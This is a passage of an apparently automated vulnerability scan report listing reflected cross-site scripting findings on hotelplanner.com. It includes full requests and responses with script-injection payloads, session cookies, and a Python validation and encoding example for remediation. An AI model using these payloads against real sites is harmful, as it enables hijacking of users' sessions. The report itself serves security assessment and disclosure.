Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:23:02 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
pen(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113c7a9e"><script>alert(1)</script>75d130eda71&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.273. http://www.hotelplanner.com/Search/index.cfm [btnGo.y parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the btnGo.y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84317"><script>alert(1)</script>80ec618c45b was submitted in the btnGo.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
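Findings 4.266 to 4.273 all come from the /Search/index.cfm form, and most of the affected fields (NumRooms, PriceMin, PriceMax, Rating, btnGo.x, btnGo.y) are numbers or fixed choices. The following added example, which is not hotelplanner.com code, validates that query string against an allow-list of names and types before anything is rendered, and shows beside it the one field this does not cover: HotelName is free text, so it still needs output encoding at the sink (the text-node sink of 4.267 is shown for NumRooms as well). The field types, ranges and the ViewType value set are assumptions drawn from the requests in this report, the re-display of HotelName in an input element is assumed, and the function names are this example's own.

```python
"""Allow-list validation for the /Search/index.cfm query string, beside the
output encoding that the free-text field still needs."""
import html
import re
from datetime import datetime
from urllib.parse import parse_qs

# The query string observed in finding 4.266 (payload removed), used as input.
OBSERVED_QUERY = ("City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011"
                  "&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1"
                  "&PriceMax=9999&btnGo.x=113&btnGo.y=15")

# Assumed allow-list for ViewType: "List" is the only value seen in the report.
VIEW_TYPES = {"List"}


class ValidationError(ValueError):
    """Raised with a field-qualified message; the caller answers 400."""


def _single(query, name, default=""):
    # parse_qs yields lists; a repeated field is rejected rather than
    # silently taking the first or the last copy.
    values = query.get(name, [default])
    if len(values) != 1:
        raise ValidationError(f"{name}: repeated parameter")
    return values[0]


def _integer(query, name, low, high, default=None):
    raw = _single(query, name, "" if default is None else str(default))
    if not re.fullmatch(r"[0-9]{1,6}", raw):
        raise ValidationError(f"{name}: expected an integer")
    value = int(raw)
    if not low <= value <= high:
        raise ValidationError(f"{name}: out of range {low}-{high}")
    return value


def _date(query, name):
    raw = _single(query, name)
    try:
        return datetime.strptime(raw, "%m/%d/%Y").date()
    except ValueError:
        raise ValidationError(f"{name}: expected mm/dd/yyyy") from None


def validate_search(query_string):
    """Returns typed values for the search form or raises ValidationError.
    Only known names are read, so an arbitrary parameter name (finding 4.264)
    and the image-button coordinates btnGo.x/btnGo.y never reach a template."""
    q = parse_qs(query_string, keep_blank_values=True)
    params = {
        "City": _single(q, "City")[:80],
        "InDate": _date(q, "InDate"),
        "OutDate": _date(q, "OutDate"),
        "NumRooms": _integer(q, "NumRooms", 1, 500),
        "PriceMin": _integer(q, "PriceMin", 0, 99999, default=1),
        "PriceMax": _integer(q, "PriceMax", 0, 99999, default=9999),
        "ViewType": _single(q, "ViewType", "List"),
        # Free text: bounded in length, but it still needs output encoding.
        "HotelName": _single(q, "HotelName")[:100],
    }
    params["Rating"] = _integer(q, "Rating", 1, 5) if _single(q, "Rating") else None
    if params["ViewType"] not in VIEW_TYPES:
        raise ValidationError("ViewType: not an allowed value")
    if params["OutDate"] <= params["InDate"]:
        raise ValidationError("OutDate: must be after InDate")
    if params["PriceMin"] > params["PriceMax"]:
        raise ValidationError("PriceMin: exceeds PriceMax")
    return params


def rejection_reason(query_string):
    """None when the query validates, otherwise the first error message."""
    try:
        validate_search(query_string)
    except ValidationError as exc:
        return str(exc)
    return None


def render_rooms_line(params):
    # Text-node sink of finding 4.267. NumRooms is an int by now; html.escape
    # is applied anyway so the template stays safe if the type ever loosens.
    return (f"<strong>Check instant online group rates for "
            f"{html.escape(str(params['NumRooms']))} rooms</strong>")


def render_hotel_name_field(params):
    # Assumed re-display of the free-text field in a double-quoted attribute:
    # validation passes the payload through, so quote=True encoding is what
    # keeps it inert here.
    value = html.escape(params["HotelName"], quote=True)
    return f'<input type="text" name="HotelName" value="{value}">'


if __name__ == "__main__":
    print(validate_search(OBSERVED_QUERY))
    print(rejection_reason(OBSERVED_QUERY.replace(
        "NumRooms=1&", "NumRooms=919fb<script>alert(1)</script>49f0b73eca3&")))
```

Validation rejects the NumRooms, PriceMin, PriceMax, Rating and ViewType payloads from this report at the boundary, drops the arbitrary parameter name of 4.264 and the btnGo coordinates, and accepts the HotelName payload unchanged, which is the point: City and HotelName are legitimately free text, so the share-link and form sinks must still encode every value they write out, validation or not.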

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=1584317"><script>alert(1)</script>80ec618c45b HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:23:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=1584317"><script>alert(1)</script>80ec618c45b', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.274. https://www.hotelplanner.com/Accept/Reserve.cfm [DisplayNightlyRates parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the DisplayNightlyRates request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c814"><script>alert(1)</script>9dd40173679 was submitted in the DisplayNightlyRates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
SD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.231c814"><script>alert(1)</script>9dd40173679&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierT
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="DisplayNightlyRates" value="429.49,429.49,369.231c814"><script>alert(1)</script>9dd40173679">
...[SNIP]...

4.275. https://www.hotelplanner.com/Accept/Reserve.cfm [HotelName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the HotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a147e"><script>alert(1)</script>41fbb640098 was submitted in the HotelName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
6+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTONa147e"><script>alert(1)</script>41fbb640098&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:41 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<img src="//cdn.hotelplanner.com/Common/Images/Chains/MU.gif" width="108" height="108" border="0" alt="millennium bostonian hotel bostona147e"><script>alert(1)</script>41fbb640098 Logo" hspace="0">
...[SNIP]...

4.276. https://www.hotelplanner.com/Accept/Reserve.cfm [NativeNightlyRates parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the NativeNightlyRates request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d060"><script>alert(1)</script>412c45cdb9b was submitted in the NativeNightlyRates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.236d060"><script>alert(1)</script>412c45cdb9b&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58862

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="NativeNightlyRates" value="429.49,429.49,369.236d060"><script>alert(1)</script>412c45cdb9b">
...[SNIP]...

4.277. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the ValueAdds request parameter is copied into the HTML document as plain text between tags. The payload afb9f<script>alert(1)</script>5108f199c4a was submitted in the ValueAdds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ed=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=afb9f<script>alert(1)</script>5108f199c4a&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<font color="3865a8">Includes afb9f<script>alert(1)</script>5108f199c4a!</font>
...[SNIP]...

4.278. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the ValueAdds request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbfc"><script>alert(1)</script>cfa93721e10 was submitted in the ValueAdds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ed=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=bbbfc"><script>alert(1)</script>cfa93721e10&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:15 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59052

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="ValueAdds" value="bbbfc"><script>alert(1)</script>cfa93721e10">
...[SNIP]...

4.279. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalDay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalDay request parameter is copied into an HTML comment. The payload a8493--><img%20src%3da%20onerror%3dalert(1)>bf087f08db was submitted in the arrivalDay parameter. This input was echoed as a8493--><img src=a onerror=alert(1)>bf087f08db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4a8493--><img%20src%3da%20onerror%3dalert(1)>bf087f08db&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
